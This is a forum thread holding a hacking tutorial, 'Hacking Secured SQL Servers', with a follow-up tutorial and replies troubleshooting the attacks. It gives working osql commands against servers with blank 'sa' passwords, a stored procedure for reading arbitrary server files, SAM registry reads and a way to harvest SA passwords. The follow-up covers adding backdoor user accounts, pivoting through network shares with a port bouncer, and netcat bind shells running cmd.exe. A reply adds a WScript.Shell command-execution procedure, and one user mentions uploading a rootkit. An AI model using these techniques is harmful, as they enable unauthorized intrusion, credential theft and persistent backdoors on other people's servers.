********************************************************************************
***************
*Hacking Secured SQL Servers *
*Tutorial Written By: DiabloHorn *
*Creditz: Swiv,www.google.com,www.sqlsecurity.com *
*Use on you're own Risk. *
*All the things in here will only work if the corresponding .dll files exist and are original.*
********************************************************************************
***************

0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
7) Final Words



0) Index

This tutorial is intended as a guide to hack the secured sql servers. Conentrating on the well
known SQL_ERROR respons.
This means:

- Hack sql servers that has only got a normmal user pass
- Hack sql servers where the stored proceduure xp_cmdshell has been disabled

This DOESN'T mean:

- Hack sql servers where the .dll has been changed or switched with another one.
- Explaining how to bruteforce sql server aaccounts

Hope this tutorials is ofany use to those who want hack more things or just want to know things.
Plz bitch about this tut if things don't work but don't start bitching that it is to slow
to hack more then 10 machines a day.

I also want to thank Swiv for his time to answer my question and to his portion of contribution to this
tutorial.

1) Tools Needed

- A server with port 1433 open and the corrrect username/password
- osql.exe
- sqlexec.exe written by sunx (the 1 with tthat has the green apple as icon)

ALSO keep in mind that all of the given commands only work if they are enabled else it will fail
********************************************************************************
*************************
2) The Easiest Way

First of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1.0"
So use sqlexec.exe that has a green apple als icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.

The options:

1 xp_cmdshell"%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s


Option 1 is the same as in "sqlexec for nethacker 1.0" So when "sqlexec for nethacker 1.0" gives a
SQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hack
the server in normal way.
********************************************************************************
*************************
3) Restoring xp_cmdshell

Restoring xp_cmdshell seems like difficult task but in fact it is easy.
first of all this only works when the stored procedure xp_cmdshell is dropt if the .dll has been changed
then it won't work.
Tis is only intended when the easy way doesn't work but most of the time it does.

Put the following in a .txt(example: restore.txt) and save it in te same directory as osql.exe is

//////////////////////////////////////////////////////////////////////////////////////////////////////
use master /
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'/
go /
//////////////////////////////////////////////////////////////////////////////////////////////////////

The above path depends on the installation of MSSQL so it can be different under some circumstances.
when done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt

Now if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.

If you want to view all stored procedure on the server currently in youre power execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"

Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones.
********************************************************************************
*************************
4) Reading almost any file on server

I say any because sometimes when the file is to big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it for that execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"

If the file exists it will give back some numbers meaning filesize,date etc.

When teh respond was a positive repost put the following in a .txt(example: read.txt) and make shure it
is in the same folder as osql.exe

////////////////////////////////////////////////////////
Create proc sp_readTextFile @filename sysname /
as /
begin /
set nocount on /
Create table #tempfile (line varchar(8000)) /
exec ('bulk insert #tempfile from "' + @filename + '"')/
select * from #tempfile /
drop table #tempfile /
End /
go /
////////////////////////////////////////////////////////

when done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt

You have now succesfully created a stored procedure to read files.Now how doyou read files with it?
Very simple use osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt

Then just browse to youre local C: and there you will find the file.Only problem is there will be a lot
of wite stripes and "-" character that is the normal sql output way I can't do anything about that.
********************************************************************************
*************************
5) Reading The Registry

Reading the registry cna be handy when there is valuable information stored into it like passwords or
usernames.
I'll give a little example on how to read the sam file just take 1 note even if you read the sam file on
a win2k machine it is useless because of the standard security it has. Explanation on what you can do
with registry reading will be explained later.

Fire up osql.exe and execute it like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

the password of the SA user is stored in plain text could be handy if you hack a machine that has sql
running and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql pass
from the registry.

I do commend u, works far superior to the other one (although i eventually did get the thing working with massive modification to the provided syntax)

1 thing i didnt understadn if i ahve sql_error wat i need to do in order to bypass it

i get alway errors like this:
.139 -U sa -P "" -i read.txt
1> 2> 3> 4> 5> 6> 7> 8> 9> 10> 11> Meldung 170, Ebene 15, Status 1, Server SPAJD
A, Prozedur sp_readTextFile, Zeile 2
Line 2: Incorrect syntax near '/'.
Meldung 170, Ebene 15, Status 1, Server SPAJDA, Prozedur sp_readTextFile, Zeile
4
Line 4: Incorrect syntax near '/'.
Meldung 170, Ebene 15, Status 1, Server SPAJDA, Prozedur sp_readTextFile, Zeile
5
Line 5: Incorrect syntax near '/'.
Meldung 170, Ebene 15, Status 1, Server SPAJDA, Prozedur sp_readTextFile, Zeile
6
Line 6: Incorrect syntax near '/'.

and for what i can use the reading files method ?

I think that isn´t the right Forum ...

this is "How to hack a Secured SQL"

thx 4 that, i searched a long time 4 a way to reactivate cmd in sql....



plz share a download file with sqlexec


aTa

@ sylver
remove the "/" at the end of all the lines

@ aTahualPa
here is the file you need

http://www.sunx.org/mysoft/SqlExec.exe

ok thanks basepart
is there a method to see in which dir is mssql installed?
and for what i can use the reading files method ?
i get also this error:

...139 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\
SAM\Domains\Account', 'F'"
Meldung 170, Ebene 15, Status 1, Server SPAJDA, Zeile 1
Line 1: Incorrect syntax near '''.
someone could help ?

is someone who has restored the cmdshell?
i tried with no success

This method of restoring xp_cmdshell only works if the dll in which xp_cmdshell recides = not deleted or altered.

yes it works Have tried it myself (I am the author of that tut).

and reading files can be usefull for let's say there is a service running on a port and it is a remote login service and when you read about it you see it stored the password or encrypted pass in a file then just read the file and crack it.

But just try to use youre imagination.

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

osql.exe -S xxxxxxxx -U sa -P xxxxx -i restore.txt
1> 2> 3> Msg 2714, Level 16, State 7, Server TEST, Procedure sp_addextendedproc,
Line 26
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named
'xp_cmdshell' in the database.
1>



mmh, doesn't works

No offcourse not just share it as much as you want as long as the credits are in there you can do whatever ya want

there are more tut's from me and other peeps on:

http://woodys-software.tk


I love info sharing and knowlegde so just go ahead

@aTahualPa


that means that xp_cmdshell already exists so no need to restore it just use it unless the acces has been restricted

i got my first one working....but when i want to connect my connection is timed out.... wtf....i know it works!!

and ofcourse i wont take the credits for something i didnt write!!!


but gotta say thx!!!

.....

using this

CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)


EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
--If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult


EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

i get a error on connecting...say 'line 20 incorrect syntax near '@shell ID'

what that mean to me??

resize window to full size ..
and create the procedure again
but drop the one you created wrong
or create the new one with another name
you got a line brake @ wrong position

the function in the "SQL Server Command" text field has to look EXACTLY like postetd

i am not sure what i am doing wrong....could it be i am not doing anything wrong and it just doesn´t work??

coried from your text and get the same error

i get always this 8007000.." error
when i get 0 and 1 as result, i am right that 0 is false - not executed ?

Is there any problem to try this methods with a router ?
I tried the method with sqlbrowser and it says, that the server could not be found, but if i try to connect with sqlexec, i get the connection and the SQL_ERROR.

any solutions ?

i also have a router an have no problems to connect-but something i did wrong :-(

I dont think that you could post here any hack trick, for secured sql server...
thats break all rulez, sorry dude... plz remote it again

1. rehack begins in the fxp/site/other scene. You Breakin tha rulz !
2. is this not a hacking forum ! this is a security forum

When it comes to Network Security, my philosophy is - "You can't afford to know less than the Hacker." This means that in order to protect ourselves effectively, we need to understand and experience the same tools and techniques that are used against us.

1) this has to do absolutely nothing to do with FXP scene ... it's a tutorial wich shows you that it isn't that simple securing your mssql server by deleting a dll or something...

2) this is a security forum yes ...
and i definitly think this is security related ..

so would you please tell me any reason why a database admin should NOT know this ??

all.....
need the "SysAdmin"

yep fantafour is right about this jockel.
look at the people trying your tut ... you see they dont get it working cause the know nothing about mssql and its commands. trying to hack secured mssql servers knowing nothing about it. not getting a 100% working procedur working on a mssql database.
for the others, you shouldn't mess around in the mssql database of servers you dont own when you dont even know what you are doing.

thank you 4 this nice tuts, very usefull, i test it now

Thx jockel for this tut have testet it works fine

greetz

BigBen

You all should be kicked/banned only lame hacking not securing

I have one more to add that belongs to this too, credits go out to DiabloHorn

SQL- Possible situation and solutions to it.
Written By: DiabloHorn
Some info is from other tutorials thx to the peeps who wrote them.

Well this tut is intended for the harder machines that are not so easy to hack.


1.) a machine with a intern ip number
2.) a machine in a network with no rights to write to the local harddisk
3.) a alternative shell to the normal sqlexec.exe
4.) A bit of maybe usefull words




______________________________________

1.) a machine with a intern ip number |
______________________________________

*********Solution Number 1:************************

Thx to dD for the initial tutorial.

Let's say you hack a machine with the normal sa/blank pass and when you do ipconfig
it says 10.0.0.15 or 192.53.56.12.
The first thing to do is to check if it has firewall if that is not the case then look
if port 135 = open or port 3389.
Add yourself as a new user or change the password of the admin

change: net user Admin newpass
new: net user test password /add

When you've done this you can connect with remote desktop to 3389 and use the user/pass
or just do it the traditional NT way


*********Solution Number 2:************************

Always when you have a machine with a internal ip number it means that it is part of a network
that means 2 things that is has ports forwarded that's how you hacked it the port of SQL = forwarded
pretty dumb but ohwell and it also means that there is another machine who has a normal ip or a
router.
If it is a normal machine then they have used software things and 2 network card to make a network if
this is the case you can still run a ftp server on it.

first you've got to do is find out what the main server could be

view computers on te network: net view

usually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etc

Ones you've find that out you've got to see if they have shares

share command: net view \\MainServer

if they've got like C shared or something like that you can just connect to it with no password.

connect command: net use Z: \\MainServer\C

then change to the new mapped drive. Now comes the tricky part.

When you are on the share of the server you've got to install a bouncer or a redirector
that is a thing that redirects the connection a port to another port or IP.
For this example I'll use Bouncer already posted at the board:)

you run it (it's best to install it as a service bouncer itself has no service option but it can still be done)

command for bouncer: bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemon

little info on this line --port = the listening port on the server machine
--destination = the intern ip to where it should be bounced or redirected the incomming traffic.

when this is done just run you're favo ftp server on the intern machine and all connection will get there.


_________________________________________________________________________

2.) a machine in a network with no rights to write to the local harddisk |
_________________________________________________________________________


When you have a machine that when you use ftp or tftp says that it can't write to local harddisk.
Then just used the method explained above to hack it on the NT way
because even though you can't write to the harddisk you usually still can add users etc

__________________________________________________

3.) a alternative shell to the normal sqlexec.exe |
__________________________________________________

Usually when you have got sqlexec connected and you are working with it usually you get errors like:

SQL_NO_DATA
SQL_ERROR

and then you just can't do anything with it well here a simple but effective way to get a other shell.

if tftp or ftp works just upload nc.exe(netcat can found everywhere on the net).

ones uploaded there are 2 commands you can use:

command1: nc.exe -l -p 1234 -d -e cmd.exe
command2: nc.exe -p 1234 -L -d -e cmd.exe

first of all it is NOT WISE to install nc as a service since it doesn't have password protection that
means that anyone can take over the machine

nou explanation of the commands:

command1: this is a use and dump command it means that you can connect only ones to it after you disconnet
it is gone then you've got to do it all over again with sql.
But as said before this shell is intended to make the hack easier and not as backdoor.

command2: with this command nc keeps listening so after you disconnect you can reconnect again.
this is only handy if you are hacking a network and need to disconnect to do other things or something
like that but not recomended because if someone finds it bye bye stro you can stop this by killing nc
after you are done.

_________________________________

4.) A bit of maybe usefull words |
_________________________________

well first of all this are not the right words for a fxp scene but oh well

when you are hacking or you wanna learn to hack plz make a diference for yourself I mean

make up you're mind if you wannabee super fxp dude (100stro's in 1 hour) OR
you wanna learn to hack interesting shit

for the first peeps this tut is useless because it is time consuming so just use the normal and fast shit
skip networks and such things

for the second peeps tut it can be usefull because it mixes a few ways together so at the end you have
control of the machine.

Last thing to say

Hack away but keep it nice

Greetz,

DiabloHorn

cool nice tut i saw it on his nice page :-)
but "a alternative shell to the normal sqlexec.exe " is not succeeded when the cmd_shell is deleted...

Hmmm, gonna read this tutorial for sure, nice work!

ok with that said and done ... what about a server that shows this ...
Server: Msg 2812, Level 16, State 62, Line 1
Could not find stored procedure 'xp_cmdshell'.

whats the cmd to enable the procedure

@batman

you will find the answer if you use the board-search.

search rockz.

have a nice weekend.
cheerz

i did search ... and nothin was found .. there were posts for if the xp cmd wasnt found but in my case the procedure isnt enabled i wanna know how to enable it ...

u can try to rewrite the procedure with the same name to enable it-but dont know if that works.....

hmm sounds like a plan
ill try it
thnx

damn no luck ...

i know about enabling if xp cmd wasdisabled but the procedure thing is annoying me getting same message first i did this

use master
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
go

then this came up

Server: Msg 2714, Level 16, State 7, Procedure sp_addextendedproc, Line 26
There is already an object named 'xp_cmdshell' in the database.

then i tried to run the xp cmd and this came up

Server: Msg 2812, Level 16, State 62, Line 1
Could not find stored procedure 'xp_cmdshell'.

and thats where im stuck

batman

DROP PROC xp_cmdshell

and add new

strored an extended procedures

or path are false

thanks for the nice tut


metrox

ok i did it
DROP PROC xp_cmdshell

then it came up good
The command(s) completed successfully.

then to re enable it i did
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

Then it completed good

then when i tried xp cmd i got
Msg 50001, Level 1, State 50001
xpsql.cpp: Error 5 from CreateProcess on line 675


any ideas?

nice one man THNX!

ok totally of the subject here....but i have a server, when i try and start serv-u, it always comes up with

this executable is a part of Network Associates tools.
McShield, Framework etc.
if you want to kill this you will have to delete the services if mcshield, framework and the other tools installed since one of this blocks you to install services.
then you would have to reboot that machine.
how ever wouldn't mess around with it. administrator will find out in no time.
there is no other way I know of since network associates tools protect each other from beeing killed.
or maybe your problem is that you don't have the rights to install a service because mssql server runs on a low level account. (this should always be the case but never is)

10x for the tut
but when i make this restore.txt file i still have the sql_error
or it doesnt matter he still will crate this file and i can execute it or to do other thing in order to make this file plz help

thanks RFlash....but i found out what the bitch had to do....it had another program open keeping that naprd open, so i had to find this other program and kill that....its all good now, got it up and running...thanks for the help anyway

Hi I Was reading The Tut And All... I Wanted To Kno Were I Can Get osql.exe or a program liek that this si my problem
i got a successfull login for MSSQL and i upload my rootkit then sqlexec freezes is there anyway that i can prevent this? or anyway of starting my file on that computer thanks